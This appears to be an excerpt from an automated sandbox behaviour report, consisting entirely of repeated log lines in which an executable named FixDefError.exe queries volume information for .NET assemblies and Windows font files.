      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
